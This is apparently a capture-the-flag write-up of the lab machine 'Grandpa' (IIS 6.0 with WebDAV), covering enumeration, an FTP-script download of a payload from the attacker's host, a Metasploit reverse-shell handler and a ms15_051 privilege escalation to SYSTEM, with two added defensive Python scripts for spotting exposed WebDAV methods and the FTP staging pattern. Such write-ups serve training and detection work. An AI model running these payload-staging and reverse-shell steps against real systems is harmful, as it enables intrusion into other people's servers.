Grandpa

OS: Windows, Difficulty: Easy, IP: 10.10.10.14

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul 20 14:38:04 2019 as: nmap -sV -sC -O -A -p 80 -oN O-detailed 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unkown
|   Server Date: Sat, 20 Jul 2019 09:01:36 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   230.48 ms 10.10.14.1
2   230.74 ms 10.10.10.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 20 14:38:23 2019 -- 1 IP address (1 host up) scanned in 18.76 seconds
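From a defender's point of view the scan above already contains the finding that matters: IIS 6.0 with WebDAV enabled and write-capable methods (PUT, DELETE, MOVE, MKCOL, PROPPATCH) advertised on a site that is supposedly under construction. The Python below is an added example, not part of the original writeup and not Nmap's own code; it parses the http-methods / http-webdav-scan lines of an Nmap normal-format report into sets of methods and flags anything beyond a read-only baseline. The embedded sample text is a constructed excerpt in the shape of the scan above, and the baseline and the risk groupings are my assumptions.

```python
import re

# Constructed excerpt shaped like Nmap's http-methods / http-webdav-scan
# output (sample data, not a live scan).
SAMPLE_NMAP_OUTPUT = """\
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unkown
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
"""

# Assumed read-only baseline for a static site, and two risk groups:
# methods that let a client write to the server, and methods that leak
# structure or enable cross-site tracing.
READ_ONLY_BASELINE = {"GET", "HEAD", "POST", "OPTIONS"}
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
INFO_METHODS = {"TRACE", "PROPFIND", "SEARCH"}
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}

# Matches script lines of the form "|   Label: M1, M2" or "|_  Label: M1 M2"
# whose value is an all-uppercase method list.
METHOD_LINE = re.compile(r"^\|_?\s+([A-Za-z ]+?):\s+([A-Z ,]+)$")


def parse_method_lines(nmap_text):
    """Return {label: set(methods)} for every method-list line in the report."""
    found = {}
    for line in nmap_text.splitlines():
        m = METHOD_LINE.match(line)
        if not m:
            continue
        label = m.group(1).strip()
        methods = {tok for tok in re.split(r"[ ,]+", m.group(2)) if tok}
        found[label] = methods
    return found


def assess_exposure(nmap_text):
    """Summarise which advertised methods exceed the read-only baseline.

    'Allowed Methods' is what the server accepted on the probed path and
    'Public Options' is what it advertises; either is enough for a finding,
    so the union of all method lists is assessed.
    """
    parsed = parse_method_lines(nmap_text)
    advertised = set()
    for methods in parsed.values():
        advertised |= methods
    return {
        "unexpected": sorted(advertised - READ_ONLY_BASELINE),
        "write": sorted(advertised & WRITE_METHODS),
        "info": sorted(advertised & INFO_METHODS),
        "webdav_enabled": bool(advertised & WEBDAV_METHODS),
    }


if __name__ == "__main__":
    for key, value in assess_exposure(SAMPLE_NMAP_OUTPUT).items():
        print(f"{key}: {value}")
```

Run it over an -oN report to triage which hosts still need WebDAV disabled or restricted; an IIS 6.0 host advertising PUT and MOVE is exactly the precondition the rest of this writeup relies on.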

Only the web-server port was open, so the obvious choice was to look at it, but it returned an error page with no information. I started hammering it with gobuster, dirbuster, and dirb, got a few directories, and with a little study found out that it was running FrontPage 5.X.Y.Z. I tried some exploits for that, but they didn't seem to work. So I attacked the IIS 6.0 server itself; none of the MSF modules worked for me, so I chose the manual route and used the exploit mentioned below to get a low-privileged shell.

Now the plan of action was to upgrade this shell to NT AUTHORITY\SYSTEM, as this shell didn't even get me the user flag. I tried running Windows Exploit Suggester and tried many of the exploits it proposed without Metasploit, but they didn't seem to work; they should have, but to no avail, they didn't work for me.

The next plan of action was to upgrade the current shell to Meterpreter to get better control. The main struggle was how to upload and execute my msfvenom payload. After a little research I learned that FTP can be used to achieve this; the shell was too unstable to send commands as usual, but ftp had me covered here.

Start your own FTP server using twistd; this allows anonymous logins:

sudo twistd -n ftp -r . -p 21

On the Windows box I created a file containing all the FTP commands that would fetch my payload and put it into the current directory (I chose %TEMP%):

echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME

Now run those commands non-interactively with ftp's -n (no auto-login) and -s: (script file) flags:

ftp -ns:$FILE_NAME

This got my payload onto the box, and I then ran it to get a Meterpreter shell.
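Seen from the blue team, the transfer technique above leaves a distinctive trail in process-creation telemetry: cmd.exe assembling a script with chained echo redirections, then ftp.exe started with the -s: script flag (bundled here as -ns:), and in this case both running under the IIS worker process. The Python below is an added example, not part of the original writeup; it parses a handful of flattened process-creation events and applies those three rules. The event lines, their Key=value layout, the worker-process names and the "at least two echo lines" threshold are constructed assumptions, modelled on the fields of Sysmon Event ID 1 / Security Event 4688.

```python
import re

# Constructed process-creation events, flattened to one "Key=value" line
# each (sample data shaped like Sysmon Event ID 1 / 4688, not real logs).
SAMPLE_EVENTS = [
    "Image=C:\\WINDOWS\\system32\\cmd.exe CommandLine=cmd.exe /c echo open 10.10.14.8 >> C:\\WINDOWS\\TEMP\\$FILE_NAME & echo USER anonymous >> C:\\WINDOWS\\TEMP\\$FILE_NAME & echo get exploit.exe >> C:\\WINDOWS\\TEMP\\$FILE_NAME & echo bye >> C:\\WINDOWS\\TEMP\\$FILE_NAME ParentImage=C:\\WINDOWS\\system32\\w3wp.exe",
    "Image=C:\\WINDOWS\\system32\\ftp.exe CommandLine=ftp -ns:$FILE_NAME ParentImage=C:\\WINDOWS\\system32\\cmd.exe",
    "Image=C:\\WINDOWS\\system32\\ftp.exe CommandLine=ftp ftp.example.internal ParentImage=C:\\WINDOWS\\explorer.exe",
    "Image=C:\\WINDOWS\\system32\\notepad.exe CommandLine=notepad.exe readme.txt ParentImage=C:\\WINDOWS\\explorer.exe",
]

KEYS = ("Image", "CommandLine", "ParentImage")

# ftp.exe script flag, alone or bundled with other single-letter flags
# (-s:file, -ns:file, -is:file ...); group 1 is the script path.
FTP_SCRIPT_FLAG = re.compile(r"(?i)(?:^|\s)-[a-z]*s:(\S+)")
# echo of an ftp command redirected into a file; group 2 is the file.
FTP_SCRIPT_BUILD = re.compile(r"(?i)echo\s+(open\s+\S+|user\s+\S+|get\s+\S+|bye)\s*>>?\s*(\S+)")
# Assumed IIS worker/server process names (IIS 6.0 uses w3wp.exe).
WEB_WORKERS = {"w3wp.exe", "inetinfo.exe"}


def parse_event(line):
    """Split a flattened 'Key=value Key=value' event into a dict.

    Values (notably CommandLine) may contain spaces, so each value runs
    until the next known key; the lookbehind keeps 'Image=' from matching
    inside 'ParentImage='.
    """
    hits = []
    for key in KEYS:
        m = re.search(r"(?<![A-Za-z])" + key + "=", line)
        if m:
            hits.append((m.start(), key))
    hits.sort()
    fields = {}
    for i, (pos, key) in enumerate(hits):
        start = pos + len(key) + 1
        end = hits[i + 1][0] if i + 1 < len(hits) else len(line)
        fields[key] = line[start:end].strip()
    return fields


def classify_event(fields):
    """Return the list of rule hits (empty when the event looks benign)."""
    image = fields.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmdline = fields.get("CommandLine", "")
    parent = fields.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if image == "ftp.exe":
        m = FTP_SCRIPT_FLAG.search(cmdline)
        if m:
            reasons.append(f"ftp.exe driven by script file {m.group(1)} (-s:)")
    if image == "cmd.exe":
        built = FTP_SCRIPT_BUILD.findall(cmdline)
        if len(built) >= 2:  # assumed threshold: two or more ftp lines echoed
            reasons.append(f"cmd.exe assembling an ftp script in {built[0][1]}")
    if parent in WEB_WORKERS and image in {"cmd.exe", "ftp.exe"}:
        reasons.append(f"{image} spawned by web server process {parent}")
    return reasons


def scan_events(lines):
    """Return [(index, reasons)] for every event that hits at least one rule."""
    findings = []
    for i, line in enumerate(lines):
        reasons = classify_event(parse_event(line))
        if reasons:
            findings.append((i, reasons))
    return findings


if __name__ == "__main__":
    for index, reasons in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

The third rule is the one that survives variations of the first two: whatever the attacker uses to stage a file, a shell or ftp client with the web server's worker process as parent is worth an alert on its own.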

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > exploit -j -z
[*] Started reverse TCP handler on 10.10.14.8:9999
[*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.14:1051) at 2019-07-20 19:54:41 +0530
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

msf5 exploit(windows/local/ms10_015_kitrap0d) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2
SESSION => 2
msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 2688 launched.
[*] Reflectively injecting the exploit DLL into 2688...
[*] Injecting exploit into 2688...
[*] Exploit injected. Injecting payload into 2688...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.14:1059) at 2019-07-20 20:37:40 +0530

meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

However, even with the SYSTEM Meterpreter session I was not able to interact with the shell, so I had to migrate to another process and launch the shell again to get interaction.

meterpreter > migrate 2292
[*] Migrating from 2688 to 2292...
[*] Migration completed successfully.
meterpreter > shell
Process 3396 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

User Own

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5***

Root Own

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e***

Learning Outcome

I learned quite a bit from this box: target known vulnerabilities first rather than hunting down my own, how to use FTP to transfer files, and that exploits are unstable, so something that works for somebody else may not work for you. Overall a fun box.